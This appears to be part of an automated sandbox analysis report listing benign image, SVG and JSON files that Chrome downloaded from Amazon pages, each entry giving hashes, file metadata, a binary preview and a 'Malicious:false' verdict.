                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6A87C8B9478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6A87C8B8478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="D123D7C80C3A5A9537F33E55F4397EA3" stRef:documentID="D123D7C80C3A5A9537F33E55F4397EA3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d...................f....................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 311x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):14598
                                                                                                                                                                                                                                                                      Entropy (8bit):7.947099893085798
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:XTgJ6t0MeAbfjGJfXojGFgzKC0zwsl744fTx2r:XTgJ6aMeAWp4jGF6KC0zwE7jfTxs
                                                                                                                                                                                                                                                                      MD5:BA5809ACD4E35C98DB98FE6E03168D1A
                                                                                                                                                                                                                                                                      SHA1:5B3294C4EC050082E4CCAC2AF515FEFD25B14386
                                                                                                                                                                                                                                                                      SHA-256:A1F6B2968EF8D2B56B6E8863C184F5947DBB9EFCC4E831CFF47FFA56E407183D
                                                                                                                                                                                                                                                                      SHA-512:CD1C44AE8D2A38E13FF26419C5B201BB009145027AEDC13EA0DACFD01FE2D8A54B5FC70D91A114DCE2A9D31BBDD822F2E3938B609807BCBB91A6ABEC14755102
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........7.."..........5...............................................................................ff..".f.7.A.A..9Q....W.{..T..$...*B..M....V/+....XLbt.......T.h./.N.e.K..Ng.=...[ .Q0s..n....S.9....\.f.P.Z..3{.7.u-... m.-...s....r.Y........@>J.uYq2.W.n.z..1... ..M..^_+.dc....Q..z.....h.xX.M..w./...x.....^f.:.^......Mh..+.r... ..i...ek..3.6..xc1.lIc..X.....66).5..g...=*.M.W..vM.._..V\t./.l..=...~p'}........!.Lg.K5..Qu.....K.V....&..y.z.=2...+`....J...f..h.%.r}zRd5..0...s.|."..S..7.O......I.,u._w.....$...>+....j.q.2.B.A/.8q.K...j..I..]~(..8ns..b.,./..N..9.M.....s.o....r.lx[.o[:.,c..H.cz.to...|..9....1b.xX.y..j./.n.}6.a5.x..O..;.....=6;7-)..6.FA.(....m....;T....J`...0.._..t9.1)._..l...R..sY.......n.......Z..;..R.uno./I.}....,N5.8.#..kd.t.M...[....a.^Q.7.<....V.Z...3<.jv....dw.>t.^.h..s]OlU.~6.w..tj....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):42780
                                                                                                                                                                                                                                                                      Entropy (8bit):7.924561093329248
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:4YyY32mHtWKedyWYCfy3fWhse1LH7y+hc7mmZt+sHtUoMKKU:4E31BeAWYCDhfhHe+hcZ7lHtJ9
                                                                                                                                                                                                                                                                      MD5:30AE77040DEE6A4830D592E35706E417
                                                                                                                                                                                                                                                                      SHA1:B4343DC008E303878BE7A933575595D1464BB0A9
                                                                                                                                                                                                                                                                      SHA-256:E40335BFC988E305883FEE523AA50ECFB1176189F143CD1F67C92B4507FBF0BD
                                                                                                                                                                                                                                                                      SHA-512:4BF498AB7BA70609049FCF7642594CC3EACE19CAFB41DB1894FFBF49F94895348E14F9FA49FC73F7CF4C24C1395758677404BF3EC2427499B9DF650B1F041623
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_OHL_BTS24_GW_Bubbler_Toys_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1565
                                                                                                                                                                                                                                                                      Entropy (8bit):7.521041636504085
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rOrLVgR1SaDIkHjoibIfE6GcIoVYTjvpqGA:T5LVeQYbIfE6NVYHvA
                                                                                                                                                                                                                                                                      MD5:6F9A777601024AE03365BA0E0988FD1A
                                                                                                                                                                                                                                                                      SHA1:38BD59A035AC0E1FE6879E8D95BDEF9DDB30DA9E
                                                                                                                                                                                                                                                                      SHA-256:1B39175CE496EDD203AC09DE255D97996FCC83494E5226D3F897B410CEB6EB90
                                                                                                                                                                                                                                                                      SHA-512:418CBEE6E57CB2AB0BCEBEE551C2FEEF49E5D0488E8E1E6B6B5737F65F80B34EE313FD3DEFB8CF6AE50571CAC144A1E2D3EB4CFCB9055BA8171CFB446CAC4CB2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........v.....................................................!1Q..".#ARaqr....DS..$2Ccs.................................................?..." ""." "".,..n.j..,....8=....8pv...-!ax..mS.....)'t.M.y.l..j...p.................8\;.N......6.4M=..@.@.=.>.5.)..o.g.....'`.$u..^.=...r.:.Q.....w.{.2G?x..t...HA.;$.....s..0C,............g..Mu.?..V?......t..D@DD.D@DD.D@DY.(9..K...$...d..P.. ...^0q.......`.0...P.)<............}.~\.....76.m...8.A#.x...\...i...U4...o;&}. 0.H&4e..-......d...}^.g..." ""." ""." (.CW#c.....q.29..7M/....W..J..Z.3......7.....9...3..'...(!n..cZ...... eR,X.].^q...+.C.......I.......Fg!.......!......[...r ...{...?..(%...............@_.g.[.p.....l,.J~c...........9.8..m....UY.......L~r;i...."..AM.3.+..t...O........\J.i..U7..........l...V..D@DD.D@DD.D@[3.Z...q}.7..z.?.t.nVeX.j.4..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):31007
                                                                                                                                                                                                                                                                      Entropy (8bit):7.962341771324061
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1hWm6712DI62uZymE9rC+cTE49GZVPrDGoeCO8Az+7:2m6712zGdcMZV1O8Ae
                                                                                                                                                                                                                                                                      MD5:1F517782D80570ADA413820FC88CB154
                                                                                                                                                                                                                                                                      SHA1:45A4523A3296C1FCA960146ABAA1A7A1B9AE0491
                                                                                                                                                                                                                                                                      SHA-256:4C629536C1CC6991BDEF1B69C13C06812C4164D26187707B2B48293FC7F5E0C5
                                                                                                                                                                                                                                                                      SHA-512:D2AC0798FB10510ED7972405A43FBA40CB9604D6F4B5099C989157F4B04668F73B7FA4EC0BE0C6850D2EE7447877FDAD0AC079E63C9057DB8B630A09554A2C25
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................=\..D.A.j .8|.UUh.ED...(".r.....DEW.Uk....8.. .5...#.r...D,X|p5Z...p..PT.F.8..(.."4h...[..F.L..F........F.....Y...U..q.{._....G..QT.......qD.F..Z.PD.y...;(y..99{9......DF..F...5.:&.. .J.).../....7....... (.A..5.C..>Kh.9.Fq...<..<...tb.|..[.....D.....N.W"..s.F..s\Oi...0.?..$gi..cG*..A..#..ATAA../)..9.>...nx.,.6..=E........E..*...7.....76..?.........^..1..@EH&.TD.. ......y.;=.r.]7......"(..`u.....A.T^R'.d..s.],..."(.......$..p4.......C..e.Z.}7.(........S..j...W8...O.4.....lc.....F..."#A-9DA......N....A..Z\.#E.....".."....(+0r.....cW#...}..P...x8...UUU..&>6.+)L...DDw..J.E.V.......UP..P....2.!.|....5..*7... ...U........O.zm...3.\..:..u..Z&....#.._.A@F..H9.b-..y.:..g...}s....3...M.~r.....UDj....*.....r|.....vY4..W...d......L..T.DDQ.......sx.Y..k....`...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23454
                                                                                                                                                                                                                                                                      Entropy (8bit):7.960066050617329
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:362XylC7saGwgkGOYIChPIQWFzBUz2jj2KKEqGybtQNL5Vn8XN9HGUx4fjhsizyD:3slCYXwgJOY90jjhKEqGymL5+99TuhjQ
                                                                                                                                                                                                                                                                      MD5:D63CD26924F97276B0E35C239A8EF3AA
                                                                                                                                                                                                                                                                      SHA1:27CB6AE43751E84805B9F5840DF93BB19E099EDC
                                                                                                                                                                                                                                                                      SHA-256:C04CBBE569EA56DC1AB5BF5E0857A0ACFCE9A030E4DB5D4AF42CA4FDFF4C51C8
                                                                                                                                                                                                                                                                      SHA-512:22723EA8A6BFCA3842B8A89CC75BF644AAAEB66D7C4F6B9B7128AAF4F2B9A7B38E50E68EA5E15FEE5FD30DF3221F2049854D9CEA4997E51C5B48A7D8A0D0A0CE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......=......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:FC03975124CB11EFA30E8F55AA993B0A" xmpMM:InstanceID="xmp.iid:FC03975024CB11EFA30E8F55AA993B0A" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="2AD725D48FD3018F515EAE113945F37E" stRef:documentID="2AD725D48FD3018F515EAE113945F37E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26ctb%3D1%26m%3D1%26sc%3D3YMHCN1ADEMYQEW81YBE%26pc%3D8174%26at%3D8174%26t%3D1724264962210%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26ui%3D2%26lob%3D1:8173
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1199
                                                                                                                                                                                                                                                                      Entropy (8bit):5.232938188020856
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:YtlK4hMpNY3j5xhZ4s3DsX7Y3Re8V68uIqvhGWh2DoQZIHJiwqLot4VS:YtHCePh+sArY3Re8V68uIqvhGWh2DnCF
                                                                                                                                                                                                                                                                      MD5:1848C8B772E094A6D76E50C1167E7EE5
                                                                                                                                                                                                                                                                      SHA1:F39B69CBB0B2E90986299005CE214B3847092B5A
                                                                                                                                                                                                                                                                      SHA-256:A4C8D61E5B2F574D7744F74F79FA3E4F542997B751895B0E4B2A2B6E3C60EB3A
                                                                                                                                                                                                                                                                      SHA-512:93952CE5054590FFC540324648CC94A34EC11B8000E1F8D409BF94DB3A80AE98B83192F4CFE638ADF06EE3191DF30F53A4A8C81810ABD295C5322D94D78E32AB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","feedbackFormModalHeaderText":"Leave feedback","feedbackFormModalUrl":"/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Search_auto-left-advertising-1_search-desktop-loom_placement%22%2C%22feedbackType%22%3A%22loomSearch%22%2C%22pageType%22%3A%22Search%22%2C%22slotName%22%3A%22auto-left-advertising-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adCreativeId%22%3A%220%22%2C%22adCreativeTemplateName%22%3A%22dynamicecommercesdciaedesktop%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adId%22%3A%22300164802756332%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRMT0BrY4-CsqXp65iFlSzhkAAAGRdjLjogMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICAP5LDe%22%2C%22adProgramId%22%3A%221027%22%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8","feedbackSpriteImageUrl":"https://m.media-amazon.com/images/G/01/ad-feedback/info_icon_1Xsprite.png","feedbackLinkText":"Sponsored","feedbackFormModalWidth":460,"feedbackFormModal
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11383
                                                                                                                                                                                                                                                                      Entropy (8bit):7.844944681061125
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:kPXPXFF120TFZF0BNDPE7Lb4eLmlRVpb5kFhlkmliSeLaMr3btWZeAMkHQ8ay:kP1N4xPapLA3N5mhviraY3bthAM9y
                                                                                                                                                                                                                                                                      MD5:5C0B67AFBC427537D3D077B35FEBB8F2
                                                                                                                                                                                                                                                                      SHA1:14A5F2004A9F0CDEAF376B86A1A26C46E989176A
                                                                                                                                                                                                                                                                      SHA-256:3A44CCABB8D79992D432BF911A6EFD3EBC69C679888200D525EECF4D4EF6B6D0
                                                                                                                                                                                                                                                                      SHA-512:8234C12611A655D929138C1B39BFDB57631B1B005492832D870F3694425799A2C69020BB2E929EB1AFE5514F50E335E22B9BE85493D36380483739F4FA5E7EAC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41CGjw1qziL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................................................................................................................$%j.T(p.`4d&.h..Z ov...-.7.Czo......h....y.5Q..............Yj..d_*..U..^3L....+...?^E.u.&.8A...xs|.!..7..0.7.@s{....tp.(./..{7Sd.n.].As......%;..:...........Q.Wb............i......u.O..y.............9cz..>..z..x....^...............MVi....[i...Y...k.....H.....=."wZ....3./..............RRU.Q...p..<un..>..<......+....M.&.......jf.SU6.......u[kOMKp....A.....?..C..=t..........(.*.....n>y.}..7;.Q.T...z;.f..%.............\......g..p....o`<...X....O..^...........::.:.m..O...m.8.<.P.cgq...5D...ZQ..:].!..-.M..l...|..Mk.{..:.b..`t.5....\o.._...........**.."....m>|j...K_.r._.R'..Gx..w.}.;..?...F>.Qpc.>.q..>.......V.......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x280, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):12366
                                                                                                                                                                                                                                                                      Entropy (8bit):7.940204883956905
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:g8KkT1kBAK3YUhj/5smUSQkZIOtPjd9G1Y:g8Kk5QHIqjxzUkZIOtP501Y
                                                                                                                                                                                                                                                                      MD5:F8B90D0E3577B471CD5241F5F6A713FA
                                                                                                                                                                                                                                                                      SHA1:3F10F0DAB339D3A095EFCCC534E6A1BC3FAF3B89
                                                                                                                                                                                                                                                                      SHA-256:AC0446B370A307639093974BBF6AA150C5B9CF5AF622A45B466A7EAFCFC203B0
                                                                                                                                                                                                                                                                      SHA-512:A54B781D823F439B245BF6F57D6219C9CE06325BC7825D77CB51A3D21A287F790FD6AC381A7BD234108168B11758D346BC8EF5606A1A714E456FEBBD2C6F5549
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61aLnSfQfJL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5........................................................................^....Pa...1_A..r..6.EHf..[.............m.o.#{q~b.d....wU6kYp.Z}3.h.|s.i.V.59....suw~.].#.a.............i.p..K..|..<...^4.....V..+....9i~.n....-J>..v.Sv..._...@.........u.0~.Sj....w.._N7.|.....-..\./.7.S.\. e...'.{?)............g,.YKwX.f..U.^m_...w../<.Go>x...}...z|..W0..e._S.6.x..F........g3..c.....\...O{.VD.z?l....wu....5s.m]...`.....Lu{<j.<.[f}....~..........V.#.T.xrfvF./..^K6w./.*.h....5..q8.....P.d-|.....SR>...........a..0-....t.....X.5...3p.ZV.n..\o.n.j.gO;.#*..JoZ.L.yJh(...K7.........C............e...q..+8.s[.>./.=^.^.g..v../.n.....,..y..].9.......RU.>Lj.Z.>..j...9|..........9....-.O....-G==%8...9eY3). xNEu.......}.m.N;[&aK....n.~2...idZ.g......#3.%IU...z.R.Q...vU...o.zZ...qUT..U....#-<.2..oY...R..1...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 281x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23527
                                                                                                                                                                                                                                                                      Entropy (8bit):7.977501457653315
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:BPEHY87Pqi1/g7a0bJLb1DRmR+YOdM0ZeMHN77WWwxxnKbEwHu7j9cwL6IMppcoZ:B27Ka09n1DRmRSdM0tdC5x40j9HMpTxH
                                                                                                                                                                                                                                                                      MD5:BAFE874FA0F2D088DF0ECDAF73A21AF6
                                                                                                                                                                                                                                                                      SHA1:6AF2B4D2C5815AB655E47064629D25DFF8E6794E
                                                                                                                                                                                                                                                                      SHA-256:BF4EC075A4CFFA2632246A2E7D0EFD72255E33B5CC70DCA94EDD1FE69CD1EE3B
                                                                                                                                                                                                                                                                      SHA-512:5327C4FEF5B90A2F3A5908999BBDE90E0AAC98B83581A7FAF7FB2DFD3734B90BD38739005C40F82BC502753CB9F4479B8709C84D91A7EFD16E487196CBBFE77F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........6...................................................................;.2...K.m.._....s".@Jh...6A..].."U......"uD{"YC))....%..I..K5...`.#....+v.(..*.z.....oR/t.%.[..[..u..Y.x.A.../R.vi..../3.5,.k.4.r.)%.Y.....l.$..a.>N...y..6wAx.....H.t&r.rQ.3'O2.u...|....l..9..x.|.;o.]x.,..Y..^..#}.0O?pr.z.....0....K.?2..!...b.....<.h..i...6.2.zE8..C..m.mW....".0.^..:;J.....N#...4..-...c5.O6Y...........k.M.C67R..R..1c.G9.T.....O..7].o%.Z:P*...2..a...@\..9..>:XQvU:... R.yr6x..uR.yg'.w.o^..o.tinOt+.N.T...1.IzL.$....-..z.......^...5..S,..H...l..Kv..C../4.Yu..M..?.%...6.?b.s.8I.m...1n.66......:UX.@.W..$..I .B._....x9.7.8c....4...6.9..%g.T.y.-.oL...avP.m3)....-/!.x...9b<vh.R..y!.8.F.nf....H.H1......Vk.J.N.u..YM.$98.`..[.L. .-....d.%V..e..!..3.4yB..[..q..c....!#...7D..H..ZI.I..K.0.t.t... .>7
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):14550
                                                                                                                                                                                                                                                                      Entropy (8bit):7.920838096694284
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:umSOhztXK7rPJFKyTjkLlGtOFX0MNM+gsH7GhUg:umFL67dTjkxTF8+M
                                                                                                                                                                                                                                                                      MD5:0369B2E96204F994F71A6C79D7ECEC02
                                                                                                                                                                                                                                                                      SHA1:D3B157365DA06466A04EA1A2C2E9717C822C292D
                                                                                                                                                                                                                                                                      SHA-256:1234F84F8F47660B81A577F0947F8509C3BF07857C9C13D22665A64281D3A71D
                                                                                                                                                                                                                                                                      SHA-512:77409D4C3873D9E30CECD678AEDA707F3AFF99E8055F55B5B9C53BEA09B506FA6C2BF33DC3064A496FDD472D8D1745A3333B68905AE671881259A6CCF4033FA5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259753_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........2............................................................................OU....v.O..@.(H~~.............=mv.....\...o.H....TGco;5.u.u-..$.*.........|g...............:.9...e}..!(......<....^.r@..............~.o..YH....9....<L>.:............Ni:g.y.........$#..y..t.........................Y.q.(..........CQ._q.............Z......p.8w...#..._.~...8.\B.m:)ts3.~....Z........{D.....{{h..3k.t=.n.yae@s.[Td... 1.xvU.....V7y.U..5>t.x...L..g1U.......<.......U.&..............k...G..........YeR}..e.6.1..Ek.r.T.6|0z.Y=/....u..y._:...V.F..m.....ka^;...#...N.s....q?{.;......@..........q..s.B.4...n.:.*.yWm.....hY....+i....{(n.SG.c...aS.E8.B.]...s.3z..6....A"...R..3... ....{.uz.....fgq[.....m3t..j..N...d;...h.q...US_..4.6..-.:j.j......ZZS.m.T.4................Q....Mef.?;...u....d..N.5.mIl!.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):922
                                                                                                                                                                                                                                                                      Entropy (8bit):5.338067409756557
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:tVgL6OR0UH8Z0o4PSnR0UH8Z0o4uPuTwplnJHxlLS2xke:gdSUcSSnSUcXplnJHfS2xke
                                                                                                                                                                                                                                                                      MD5:4A5F104A2A50E2E8F74627CF3F23B925
                                                                                                                                                                                                                                                                      SHA1:5CC46A309FBEEC0517B2DB862606ED47D19CB8A5
                                                                                                                                                                                                                                                                      SHA-256:CA7025BF17C133F37655A1E2AC3DE72AB0EAF2B430E3C4E655A00345D494BD6D
                                                                                                                                                                                                                                                                      SHA-512:F233C91D012C76D16047AF690CA443A0FC133B797EBF1DF0FE5C3BC38CB0530AEDB7F903664C33E2728D4DD7D68F0A4ED074B4115D7AEE8E228F1F0D3F61CCC3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/39/perc/star-fullfill.svg
